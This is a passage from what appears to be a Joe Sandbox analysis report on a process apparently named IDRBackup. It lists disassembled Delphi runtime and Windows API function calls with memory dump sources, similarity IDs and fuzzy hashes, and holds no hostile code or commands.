                                                                                                  • @Sysutils@StrDispose$qqrpb.RTL120(50028A41), ref: 50028A34
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sysutils@$Dispose$qqrpbLen$qqrpxbLower$qqrpbNew$qqrpxb$Alloc$qqruiMove$qqrpbpxbuiPos$qqrpxbt1Wide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2681763821-0
                                                                                                  • Opcode ID: dde631375cb4bb7d56f948556d53dd842de3bc36197af2cee0c4b0b25e22cf47
                                                                                                  • Instruction ID: 6bbc18074bfaf3f13c2d9ba9562f9445baf5c414cd24152d0a15d7c6618943bb
                                                                                                  • Opcode Fuzzy Hash: dde631375cb4bb7d56f948556d53dd842de3bc36197af2cee0c4b0b25e22cf47
                                                                                                  • Instruction Fuzzy Hash: 97012C71A02688AFDB01DFF8EC4168DB7F4EF18300F5186B6F514E3241DA749E818B95
                                                                                                  Function 50005654 Relevance: 10.5, APIs: 7, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrClr$qqrpv.RTL120 ref: 5000565F
                                                                                                    • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                  • @System@@ReadString$qqrr15System@TTextRecp28System@%SmallString$iuc$255%i.RTL120 ref: 50005673
                                                                                                  • @System@@LStrFromString$qqrr27System@%AnsiStringT$us$i0$%rx28System@%SmallString$iuc$255%us.RTL120 ref: 5000567E
                                                                                                  • @System@@ReadString$qqrr15System@TTextRecp28System@%SmallString$iuc$255%i.RTL120 ref: 50005692
                                                                                                  • @System@@LStrFromString$qqrr27System@%AnsiStringT$us$i0$%rx28System@%SmallString$iuc$255%us.RTL120(00000000), ref: 5000569F
                                                                                                  • @System@@LStrCat$qqrv.RTL120(00000000), ref: 500056A9
                                                                                                    • Part of subcall function 50008C34: @System@@LStrSetLength$qqrv.RTL120(?,?,?,500056AE,00000000), ref: 50008C5B
                                                                                                    • Part of subcall function 50008C34: @System@@LStrAsg$qqrpvpxv.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C72
                                                                                                    • Part of subcall function 50008C34: @System@Move$qqrpxvpvi.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C81
                                                                                                    • Part of subcall function 50008C34: @System@@LStrClr$qqrpv.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C8E
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 500056B0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@%$Small$Clr$qqrpvSystem@$AnsiFromReadRecp28StringString$iuc$255%iString$iuc$255%usString$qqrr15String$qqrr27T$us$i0$%rx28Text$Asg$qqrpvpxvCat$qqrvFreeLength$qqrvMem$qqrpvMove$qqrpxvpvi
                                                                                                  • String ID:
                                                                                                  • API String ID: 662791780-0
                                                                                                  • Opcode ID: 322fabd3b3d09446b172a1f4d472e40869cc5ee6efa0138ea9fa57a789ac56db
                                                                                                  • Instruction ID: 1597da7cb89d32d484f3510e975d69330bfa973a8168dd2e4a5d6276ee6f1995
                                                                                                  • Opcode Fuzzy Hash: 322fabd3b3d09446b172a1f4d472e40869cc5ee6efa0138ea9fa57a789ac56db
                                                                                                  • Instruction Fuzzy Hash: 9AF09A61B0628007F30822AC686227EB6C65FE9621FE4433AB1A8C73C6CD658C8203C7
                                                                                                  Function 500042F0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004321
                                                                                                  • SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004327
                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004336
                                                                                                  • SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004347
                                                                                                  • @System@@LStrFromArray$qqrr27System@%AnsiStringT$us$i0$%pcius.RTL120(00000000,00000105,?), ref: 50004359
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CurrentDirectory$AnsiArray$qqrr27FromStringSystem@%System@@T$us$i0$%pcius
                                                                                                  • String ID: :
                                                                                                  • API String ID: 812956231-336475711
                                                                                                  • Opcode ID: d4531ae81b963544f021ef1ea90c9204504484a3f5f4716b71b7cf15e618fe7b
                                                                                                  • Instruction ID: 14dd6047c926db84beaf63a8d0797b2290f23bae7271ad8ecbc2d364b264a1e3
                                                                                                  • Opcode Fuzzy Hash: d4531ae81b963544f021ef1ea90c9204504484a3f5f4716b71b7cf15e618fe7b
                                                                                                  • Instruction Fuzzy Hash: 2DF09C712857C459F301D2A45862FDB72DC8F54305F884555BAC887282E6A4894483A3
                                                                                                  Function 50004368 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 5000439E
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 500043A4
                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 500043B3
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 500043C4
                                                                                                  • @System@@WStrFromWArray$qqrr17System@WideStringpbi.RTL120(00000105,?), ref: 500043D4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CurrentDirectory$Array$qqrr17FromStringpbiSystem@System@@Wide
                                                                                                  • String ID: :
                                                                                                  • API String ID: 3520144690-336475711
                                                                                                  • Opcode ID: e61c8ef50fbd8babb1a17a426603306d17aff3204d3b54cd90e2a3508138ba61
                                                                                                  • Instruction ID: e1ff67e176dda81c190dc6a9f1a3f12452a8938599ecb663bcea915995d7201c
                                                                                                  • Opcode Fuzzy Hash: e61c8ef50fbd8babb1a17a426603306d17aff3204d3b54cd90e2a3508138ba61
                                                                                                  • Instruction Fuzzy Hash: BEF0F6A118538465F300C7909862BEB72DCDF94300F84461A7AC8C7291E764854883A7
                                                                                                  Function 5000AB98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 5000ABCF
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 5000ABD5
                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 5000ABE4
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 5000ABF5
                                                                                                  • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000105,?), ref: 5000AC05
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CurrentDirectory$Array$qqrr20FromStringpbiSystem@System@@Unicode
                                                                                                  • String ID: :
                                                                                                  • API String ID: 4026256132-336475711
                                                                                                  • Opcode ID: 2b68eb89cb681cd55a960e9aeb2ba1da6e076241664762a1b8a276035e057fc5
                                                                                                  • Instruction ID: 6165d01f749eae26b9877707474b045894ddf7302f58902652f5679b52eb8e57
                                                                                                  • Opcode Fuzzy Hash: 2b68eb89cb681cd55a960e9aeb2ba1da6e076241664762a1b8a276035e057fc5
                                                                                                  • Instruction Fuzzy Hash: 16F02B7518278469F304D3909872EE773DCDF54344F84852A76CCC7192E778C48893A7
                                                                                                  Function 50027CE0 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50027DED,?,?,00000002,00000003), ref: 50027D20
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50027DED,?,?,00000002,00000003), ref: 50027D56
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50027DED,?,?,00000002,00000003), ref: 50027DA8
                                                                                                  • @Sysutils@NextCharIndex$qqrx20System@UnicodeStringi.RTL120(00000000,50027DED,?,?,00000002,00000003), ref: 50027DC5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$AnsiFromStr$qqrr20StringStringx27System@%System@@T$us$i0$%$Internal$CharIndex$qqrx20NextStringiSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2978737052-0
                                                                                                  • Opcode ID: c73c156cb122086d3bfbdf691ceee361a25d80e81030dc572f38091c61ab5db2
                                                                                                  • Instruction ID: ac24b254b590086063bb5863af78a8b9939e5d05ce7cae268ce3fd422f29ff03
                                                                                                  • Opcode Fuzzy Hash: c73c156cb122086d3bfbdf691ceee361a25d80e81030dc572f38091c61ab5db2
                                                                                                  • Instruction Fuzzy Hash: AE31C430A0258ADFDB11DFA9EA819FDF3F5FF44300B6046A6D508A7265D770AE81CB50
                                                                                                  Function 500310C0 Relevance: 9.1, APIs: 6, Instructions: 96COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Variants@@DispInvoke$qp8TVarDatarx8TVarDatap16System@TCallDescpv.RTL120(?,?,?,?), ref: 500310E2
                                                                                                  • VariantInit.OLEAUT32(?), ref: 50031100
                                                                                                  • @Variants@FindCustomVariantType$qqrxusrp27Variants@TCustomVariantType.RTL120(00000000,500311B4,?,?), ref: 50031166
                                                                                                  • @Variants@VarInvalidOp$qqrv.RTL120(00000000,500311B4,?,?), ref: 50031186
                                                                                                  • @Variants@@VarCopy$qqrr8TVarDatarx8TVarData.RTL120(500311BB,?), ref: 500311A6
                                                                                                  • @Variants@@VarClear$qqrr8TVarData.RTL120(500311BB,?), ref: 500311AE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: VariantVariants@Variants@@$CustomDataDatarx8$CallClear$qqrr8Copy$qqrr8Datap16DescpvDispFindInitInvalidInvoke$qp8Op$qqrvSystem@TypeType$qqrxusrp27
                                                                                                  • String ID:
                                                                                                  • API String ID: 3013499437-0
                                                                                                  • Opcode ID: 5ac3dfb80ff6f8dbe992fc935fb1ad922ec3ea8af3cd2fded624ac4e5225a757
                                                                                                  • Instruction ID: 51b27559867bc955ec8fe122dba071485ba265a6bf2b90f3f5acb68f7b654021
                                                                                                  • Opcode Fuzzy Hash: 5ac3dfb80ff6f8dbe992fc935fb1ad922ec3ea8af3cd2fded624ac4e5225a757
                                                                                                  • Instruction Fuzzy Hash: 70314D75A04288AFDB12DFA8D981ADE77FCEB0C240F544662FA04D3251D770DD90CBA1
                                                                                                  Function 50028108 Relevance: 9.1, APIs: 6, Instructions: 96COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028208), ref: 5002814F
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028208), ref: 50028179
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50028208), ref: 500281B2
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50028208), ref: 500281DF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AnsiFromStr$qqrr20StringStringx27System@System@%System@@T$us$i0$%Unicode$Internal
                                                                                                  • String ID:
                                                                                                  • API String ID: 2707610650-0
                                                                                                  • Opcode ID: 82b5875e0cacdd6aef663cdc39e97f39450629254dff49b71527a16e955c069e
                                                                                                  • Instruction ID: 393b429e180957fc2cfbae899d8291979aea1af8c2bec8120106278b796e9974
                                                                                                  • Opcode Fuzzy Hash: 82b5875e0cacdd6aef663cdc39e97f39450629254dff49b71527a16e955c069e
                                                                                                  • Instruction Fuzzy Hash: D8313C34B02186EBDB01DFB8E98299DB7F9EF44200B6086B6D500D7695E730EF55D740
                                                                                                  Function 5001F77C Relevance: 9.1, APIs: 6, Instructions: 96COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxirx24Sysutils@TFormatSettings.RTL120(?,?,?,?), ref: 5001F7D8
                                                                                                  • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(?,?,?,?), ref: 5001F7F3
                                                                                                  • @System@@WStrClr$qqrpv.RTL120 ref: 5001F812
                                                                                                    • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F81B
                                                                                                    • Part of subcall function 50009C30: @System@@NewWideString$qqri.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C40
                                                                                                    • Part of subcall function 50009C30: @System@Move$qqrpxvpvi.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C6E
                                                                                                  • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxirx24Sysutils@TFormatSettings.RTL120(?,?,?,?), ref: 5001F845
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F85A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Wide$System@@$FormatSysutils@$Buf$qqrpvuipxvuipx14Length$qqrr17Recxirx24SettingsStringi$CharClr$qqrpvFreeFromLen$qqrr17Move$qqrpxvpviStringString$qqriStringpbi
                                                                                                  • String ID:
                                                                                                  • API String ID: 2345622591-0
                                                                                                  • Opcode ID: f55d6f8b79e0f7ac82ec5d1309f64e9aceca909fd4ec5542df17d6911c072fd6
                                                                                                  • Instruction ID: 727f941c8df5292463c23cd37930f27cc77a2850270d934a36b895f9e6f66720
                                                                                                  • Opcode Fuzzy Hash: f55d6f8b79e0f7ac82ec5d1309f64e9aceca909fd4ec5542df17d6911c072fd6
                                                                                                  • Instruction Fuzzy Hash: 42314F75F01549AFDB40CEADDC819AEB3F9EF58210B5082A6F918E7354DA30EE41CB90
                                                                                                  Function 5001F698 Relevance: 9.1, APIs: 6, Instructions: 92COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxi.RTL120(?,?,?), ref: 5001F6F0
                                                                                                  • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(?,?,?), ref: 5001F70B
                                                                                                  • @System@@WStrClr$qqrpv.RTL120 ref: 5001F72A
                                                                                                    • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F733
                                                                                                    • Part of subcall function 50009C30: @System@@NewWideString$qqri.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C40
                                                                                                    • Part of subcall function 50009C30: @System@Move$qqrpxvpvi.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C6E
                                                                                                  • @Sysutils@WideFormatBuf$qqrpvuipxvuipx14System@TVarRecxi.RTL120(?,?,?), ref: 5001F759
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5001F76E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Wide$System@@$Buf$qqrpvuipxvuipx14FormatLength$qqrr17RecxiStringiSysutils@$CharClr$qqrpvFreeFromLen$qqrr17Move$qqrpxvpviStringString$qqriStringpbi
                                                                                                  • String ID:
                                                                                                  • API String ID: 4105650016-0
                                                                                                  • Opcode ID: 10139ca0b291b8347723082711ce525d742fa5c123425f79956b6c0e53db1538
                                                                                                  • Instruction ID: 0f111183127a4ac1b74a776fd40eab0f620fc160a94f9ed32ff36730c38c6e24
                                                                                                  • Opcode Fuzzy Hash: 10139ca0b291b8347723082711ce525d742fa5c123425f79956b6c0e53db1538
                                                                                                  • Instruction Fuzzy Hash: FF315E75F05549ABEB00CEADDD8199EB3F9EF58210B5082B6E904E7390DA70EE41CB90
                                                                                                  Function 5002772C Relevance: 9.1, APIs: 6, Instructions: 92COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 5002776B
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002782B,?,?,?,?,?,500156A4,00000000,500156E2), ref: 500277A2
